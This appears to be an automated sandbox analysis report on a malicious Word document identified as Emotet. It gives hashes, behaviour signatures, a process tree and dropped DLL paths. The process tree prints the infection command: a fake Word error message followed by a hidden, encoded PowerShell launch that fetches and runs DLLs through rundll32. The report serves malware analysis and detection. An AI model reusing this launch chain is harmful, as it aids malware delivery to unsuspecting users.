Analysis

  • max time kernel
    150s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    09-03-2021 16:01

General

  • Target
    DAT_2112.doc
  • Size
    201KB
  • MD5
    0b0b1ef804382ed6f25b3aa11b657b72
  • SHA1
    cfd0c0603103c585185433aaf1d53879e97d5d31
  • SHA256
    687a53748f70c72633a9f00a47b027ca46def57962e21f2150a82e7567bd1c25
  • SHA512
    7043392bd4604a1321c6253041ebd095eaef2282bc4a35fd9679349a46be0e8a03a7d357a1a4a3000ff9135b2aeeac3438b2a460e51711213b76639a6eafaf5e

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs
    exe.dropper

Extracted

  • Family
    emotet
  • Botnet
    Epoch1
  • C2
  • rsa_pubkey.plain

Extracted

  • Family
    emotet
  • Botnet
    LEA
  • C2
  • rsa_pubkey.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 7 IoCs
  • Loads dropped DLL 8 IoCs
  • Drops file in System32 directory 4 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 37 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\DAT_2112.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1812
  • C:\Windows\system32\cmd.exe
    cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD 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
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1668
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:1432
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        POwersheLL -w hidden -ENCOD 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
        2⤵
        • Blocklisted process makes network request
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1716
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1688
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1
            4⤵
            • Loads dropped DLL
            • Drops file in System32 directory
            • Suspicious use of WriteProcessMemory
            PID:1680
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wufl\ilhy.seq",RunDLL
              5⤵
              • Blocklisted process makes network request
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:2004
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wufl\uoxuvhosbdx.dll",RunDLL BAIAABwAAABXAHUAZgBsAFwAaQBsAGgAeQAuAHMAZQBxAAAA
                6⤵
                • Loads dropped DLL
                • Drops file in System32 directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:1652
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wufl\ilhy.seq",Control_RunDLL
                  7⤵
                  • Blocklisted process makes network request
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1948

    MITRE ATT&CK Matrix ATT&CK v6

    • Defense Evasion: Modify Registry, T1112 (1)
    • Discovery: System Information Discovery, T1082 (1)


    Downloads

    • C:\Users\Admin\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll
      MD5
      de24d773012ce76420e96cadc48a6c92
      SHA1
      cffbf1120fc0f6d702505d5d0ed2160caba98c9c
      SHA256
      6bb1f167bccb5b48b3064af319a7a6aba843c118d8ea85e99910c60583ab6048
      SHA512
      ebbf5faa8ffccc8652ada5360621850bd9ae26e8c006e9395df7b70b149fc423b18070c9c4b5eb6e9d62059ed7a7876333b274f868fe123d538125d5fff9409c

    • C:\Windows\SysWOW64\Wufl\uoxuvhosbdx.dll
      MD5
      9a062ead5b2d55af0a5a4b39c5b5eadc
      SHA1
      fc83367be87c700a696b0329dab538b5e47d90bf
      SHA256
      a9c68d527223db40014d067cf4fdae5be46cca67387e9cfdff118276085f23ef
      SHA512
      693ab862c7e3c5dad3ca3d44bbc4a5a4c2391ff558e02e86e4c1d7d1fa7c00b4acf1c426ca619dea2b422997caaf1f0ecba37ec0ffca19edaca297005c9ad861
